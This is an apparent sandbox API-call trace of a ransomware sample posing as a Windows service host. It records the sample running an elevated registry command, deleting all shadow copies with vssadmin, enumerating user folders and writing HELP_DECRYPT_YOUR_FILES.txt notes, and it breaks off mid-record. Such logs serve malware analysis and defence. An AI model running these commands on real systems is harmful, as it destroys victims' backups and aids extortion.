# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 05.11.2020 18:35:01.315 Process: id = "1" image_name = "host process for windows services.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\host process for windows services.exe" page_root = "0x4bd82000" os_pid = "0x7a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Host Process for Windows Services.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x5d4 [0047.786] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0049.277] CoTaskMemAlloc (cb=0x20e) returned 0xa96ea0 [0049.277] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xa96ea0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0049.280] CoTaskMemFree (pv=0xa96ea0) [0049.291] GetUserNameW (in: lpBuffer=0x12d350, pcbBuffer=0x12d678 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d678) returned 1 [0049.599] GetComputerNameW (in: lpBuffer=0x12d350, nSize=0x12d678 | out: lpBuffer="XDUWTFONO", nSize=0x12d678) returned 1 [0053.033] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0xac1870 [0053.033] LocalAlloc (uFlags=0x0, uBytes=0x13c) returned 0xab60d0 [0054.695] ShellExecuteExW (in: pExecInfo=0x2269958*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="CMD.EXE", lpParameters="C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2269958*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="CMD.EXE", lpParameters="C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x300)) returned 1 [0070.487] LocalFree (hMem=0xaa5c60) returned 0x0 [0070.487] LocalFree (hMem=0xac1870) returned 0x0 [0070.487] LocalFree (hMem=0xab60d0) returned 0x0 [0070.811] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0070.814] CreatePipe (in: hReadPipe=0x12e770, hWritePipe=0x12e768, lpPipeAttributes=0x12e660, nSize=0x0 | out: hReadPipe=0x12e770*=0x2dc, hWritePipe=0x12e768*=0x2d4) returned 1 [0070.823] GetCurrentProcess () returned 0xffffffffffffffff [0070.824] GetCurrentProcess () returned 0xffffffffffffffff [0070.824] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12e7b0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x12e7b0*=0x2e4) returned 1 [0070.824] CloseHandle (hObject=0x2dc) returned 1 [0070.824] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0070.825] CoTaskMemAlloc (cb=0x20e) returned 0xac4ec0 [0070.825] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xac4ec0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0070.825] CoTaskMemFree (pv=0xac4ec0) [0070.852] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x12e600*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2d4, hStdError=0x0), lpProcessInformation=0x2269ef8 | out: lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x2269ef8*(hProcess=0x320, hThread=0x2dc, dwProcessId=0x730, dwThreadId=0x240)) returned 1 [0070.889] CloseHandle (hObject=0x2d4) returned 1 [0070.924] GetConsoleOutputCP () returned 0x0 [0071.353] GetFileType (hFile=0x2e4) returned 0x3 [0072.785] CloseHandle (hObject=0x2dc) returned 1 [0082.336] GetLogicalDrives () returned 0x4 [0082.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e700) returned 1 [0082.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", nBufferLength=0x105, lpBuffer=0x12e1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpFilePart=0x0) returned 0x27 [0082.724] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", nBufferLength=0x105, lpBuffer=0x12e190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpFilePart=0x0) returned 0x28 [0082.725] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x12e3a0 | out: lpFindFileData=0x12e3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0082.728] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.729] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0082.729] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0082.729] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0082.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e650) returned 1 [0082.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e610) returned 1 [0082.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e700) returned 1 [0082.730] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", nBufferLength=0x105, lpBuffer=0x12e1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpFilePart=0x0) returned 0x27 [0082.730] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", nBufferLength=0x105, lpBuffer=0x12e190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpFilePart=0x0) returned 0x28 [0082.730] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x12e3a0 | out: lpFindFileData=0x12e3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0082.759] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.760] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0082.760] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0082.760] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0082.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e650) returned 1 [0082.760] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e610) returned 1 [0083.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\HELP_DECRYPT_YOUR_FILES.txt", nBufferLength=0x105, lpBuffer=0x12e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\HELP_DECRYPT_YOUR_FILES.txt", lpFilePart=0x0) returned 0x43 [0083.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e580) returned 1 [0083.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\HELP_DECRYPT_YOUR_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2dc [0083.216] GetFileType (hFile=0x2dc) returned 0x1 [0083.216] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4f0) returned 1 [0083.216] GetFileType (hFile=0x2dc) returned 0x1 [0085.044] WriteFile (in: hFile=0x2dc, lpBuffer=0x2274458*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x12e628, lpOverlapped=0x0 | out: lpBuffer=0x2274458*, lpNumberOfBytesWritten=0x12e628*=0x4bc, lpOverlapped=0x0) returned 1 [0085.046] CloseHandle (hObject=0x2dc) returned 1 [0085.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e700) returned 1 [0085.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", nBufferLength=0x105, lpBuffer=0x12e1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpFilePart=0x0) returned 0x24 [0085.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", nBufferLength=0x105, lpBuffer=0x12e190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpFilePart=0x0) returned 0x25 [0085.048] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x12e3a0 | out: lpFindFileData=0x12e3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc6ce460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc6ce460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0085.048] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc6ce460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc6ce460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.049] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0847190, ftCreationTime.dwHighDateTime=0x1d5e092, ftLastAccessTime.dwLowDateTime=0x80943be0, ftLastAccessTime.dwHighDateTime=0x1d5e0ad, ftLastWriteTime.dwLowDateTime=0x80943be0, ftLastWriteTime.dwHighDateTime=0x1d5e0ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9ipY", cAlternateFileName="")) returned 1 [0085.049] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52980, ftCreationTime.dwHighDateTime=0x1d5e0ad, ftLastAccessTime.dwLowDateTime=0x46c29860, ftLastAccessTime.dwHighDateTime=0x1d5dda8, ftLastWriteTime.dwLowDateTime=0x46c29860, ftLastWriteTime.dwHighDateTime=0x1d5dda8, nFileSizeHigh=0x0, nFileSizeLow=0x14e9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="bWRd8dxM pn7NK2ZxYY.swf", cAlternateFileName="BWRD8D~1.SWF")) returned 1 [0085.049] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0085.049] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76563770, ftCreationTime.dwHighDateTime=0x1d5dbab, ftLastAccessTime.dwLowDateTime=0x9ecf0a20, ftLastAccessTime.dwHighDateTime=0x1d5ddb7, ftLastWriteTime.dwLowDateTime=0x9ecf0a20, ftLastWriteTime.dwHighDateTime=0x1d5ddb7, nFileSizeHigh=0x0, nFileSizeLow=0x5cda, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gkoi5oDLg3I.flv", cAlternateFileName="GKOI5O~1.FLV")) returned 1 [0085.049] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae10c960, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x14073b80, ftLastAccessTime.dwHighDateTime=0x1d5dbcb, ftLastWriteTime.dwLowDateTime=0x14073b80, ftLastWriteTime.dwHighDateTime=0x1d5dbcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="j-pqgTUq9vExmNB4eXJ", cAlternateFileName="J-PQGT~1")) returned 1 [0085.050] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba93bd0, ftCreationTime.dwHighDateTime=0x1d5e27b, ftLastAccessTime.dwLowDateTime=0xe9f1cad0, ftLastAccessTime.dwHighDateTime=0x1d5e148, ftLastWriteTime.dwLowDateTime=0xe9f1cad0, ftLastWriteTime.dwHighDateTime=0x1d5e148, nFileSizeHigh=0x0, nFileSizeLow=0x84db, dwReserved0=0x0, dwReserved1=0x0, cFileName="LJw9T.mp4", cAlternateFileName="")) returned 1 [0085.050] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6afdd8f0, ftCreationTime.dwHighDateTime=0x1d5d7d3, ftLastAccessTime.dwLowDateTime=0x29e8d860, ftLastAccessTime.dwHighDateTime=0x1d5de3b, ftLastWriteTime.dwLowDateTime=0x29e8d860, ftLastWriteTime.dwHighDateTime=0x1d5de3b, nFileSizeHigh=0x0, nFileSizeLow=0x4e47, dwReserved0=0x0, dwReserved1=0x0, cFileName="r6_6ecjRu.flv", cAlternateFileName="R6_6EC~1.FLV")) returned 1 [0085.050] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ce475a0, ftCreationTime.dwHighDateTime=0x1d5d82e, ftLastAccessTime.dwLowDateTime=0xa16917c0, ftLastAccessTime.dwHighDateTime=0x1d5e4cf, ftLastWriteTime.dwLowDateTime=0xa16917c0, ftLastWriteTime.dwHighDateTime=0x1d5e4cf, nFileSizeHigh=0x0, nFileSizeLow=0x14380, dwReserved0=0x0, dwReserved1=0x0, cFileName="vCwIR.mkv", cAlternateFileName="")) returned 1 [0085.050] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x841fb3a0, ftCreationTime.dwHighDateTime=0x1d5df9c, ftLastAccessTime.dwLowDateTime=0xbd4bfc40, ftLastAccessTime.dwHighDateTime=0x1d5dc47, ftLastWriteTime.dwLowDateTime=0xbd4bfc40, ftLastWriteTime.dwHighDateTime=0x1d5dc47, nFileSizeHigh=0x0, nFileSizeLow=0x13bbc, dwReserved0=0x0, dwReserved1=0x0, cFileName="wysf8ApsC2_k.swf", cAlternateFileName="WYSF8A~1.SWF")) returned 1 [0085.050] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0085.051] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0085.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e650) returned 1 [0085.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e610) returned 1 [0085.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e700) returned 1 [0085.051] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", nBufferLength=0x105, lpBuffer=0x12e1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpFilePart=0x0) returned 0x24 [0085.051] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", nBufferLength=0x105, lpBuffer=0x12e190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpFilePart=0x0) returned 0x25 [0085.051] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x12e3a0 | out: lpFindFileData=0x12e3a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc6ce460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc6ce460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0085.051] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdc6ce460, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc6ce460, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.052] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0847190, ftCreationTime.dwHighDateTime=0x1d5e092, ftLastAccessTime.dwLowDateTime=0x80943be0, ftLastAccessTime.dwHighDateTime=0x1d5e0ad, ftLastWriteTime.dwLowDateTime=0x80943be0, ftLastWriteTime.dwHighDateTime=0x1d5e0ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="9ipY", cAlternateFileName="")) returned 1 [0085.052] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52980, ftCreationTime.dwHighDateTime=0x1d5e0ad, ftLastAccessTime.dwLowDateTime=0x46c29860, ftLastAccessTime.dwHighDateTime=0x1d5dda8, ftLastWriteTime.dwLowDateTime=0x46c29860, ftLastWriteTime.dwHighDateTime=0x1d5dda8, nFileSizeHigh=0x0, nFileSizeLow=0x14e9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="bWRd8dxM pn7NK2ZxYY.swf", cAlternateFileName="BWRD8D~1.SWF")) returned 1 [0085.052] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0085.052] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76563770, ftCreationTime.dwHighDateTime=0x1d5dbab, ftLastAccessTime.dwLowDateTime=0x9ecf0a20, ftLastAccessTime.dwHighDateTime=0x1d5ddb7, ftLastWriteTime.dwLowDateTime=0x9ecf0a20, ftLastWriteTime.dwHighDateTime=0x1d5ddb7, nFileSizeHigh=0x0, nFileSizeLow=0x5cda, dwReserved0=0x0, dwReserved1=0x0, cFileName="Gkoi5oDLg3I.flv", cAlternateFileName="GKOI5O~1.FLV")) returned 1 [0085.052] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xae10c960, ftCreationTime.dwHighDateTime=0x1d5e514, ftLastAccessTime.dwLowDateTime=0x14073b80, ftLastAccessTime.dwHighDateTime=0x1d5dbcb, ftLastWriteTime.dwLowDateTime=0x14073b80, ftLastWriteTime.dwHighDateTime=0x1d5dbcb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="j-pqgTUq9vExmNB4eXJ", cAlternateFileName="J-PQGT~1")) returned 1 [0085.053] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ba93bd0, ftCreationTime.dwHighDateTime=0x1d5e27b, ftLastAccessTime.dwLowDateTime=0xe9f1cad0, ftLastAccessTime.dwHighDateTime=0x1d5e148, ftLastWriteTime.dwLowDateTime=0xe9f1cad0, ftLastWriteTime.dwHighDateTime=0x1d5e148, nFileSizeHigh=0x0, nFileSizeLow=0x84db, dwReserved0=0x0, dwReserved1=0x0, cFileName="LJw9T.mp4", cAlternateFileName="")) returned 1 [0085.053] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e3f0 | out: lpFindFileData=0x12e3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6afdd8f0, ftCreationTime.dwHighDateTime=0x1d5d7d3, ftLastAccessTime.dwLowDateTime=0x29e8d860, ftLastAccessTime.dwHighDateTime=0x1d5de3b, ftLastWriteTime.dwLowDateTime=0x29e8d860, ftLastWriteTime.dwHighDateTime=0x1d5de3b, nFileSizeHigh=0x0, nFileSizeLow=0x4e47, 